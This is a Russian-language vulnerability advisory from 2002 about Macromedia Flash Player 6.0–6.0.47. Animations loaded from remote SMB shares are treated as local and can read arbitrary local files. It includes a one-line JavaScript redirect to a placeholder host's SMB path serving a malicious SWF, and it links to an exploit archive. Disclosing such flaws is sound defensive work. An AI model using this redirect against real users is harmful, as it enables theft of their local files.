Чтение произвольных локальных файлов в Flash player

Дата публикации:
09.10.2002
Всего просмотров:
1154
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Ошибка, обнаруженная в Flash player, позволяет злонамеренным Flash анимациям читать произвольные локальные файлы.

Уязвимость происходит из-за ошибки в Flash Player при загрузке анимаций от отдаленных SMB ресурсов. Когда Flash Player загружает анимацию от сетевого SMB ресурса, она обрабатывается так, как если бы была загружена с локального жесткого диска пользователя. Уязвимость может использоваться через Web страницу, содержащую чтото типа такого:

<script language="javascript">
 document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>
Уязвимость обнаружена в Macromedia Flash 6.0-6.0.47

Ссылки: Flash player can read local files
http://www.xs4all.nl/~jkuperus/exploit.zip
или введите имя

CAPTCHA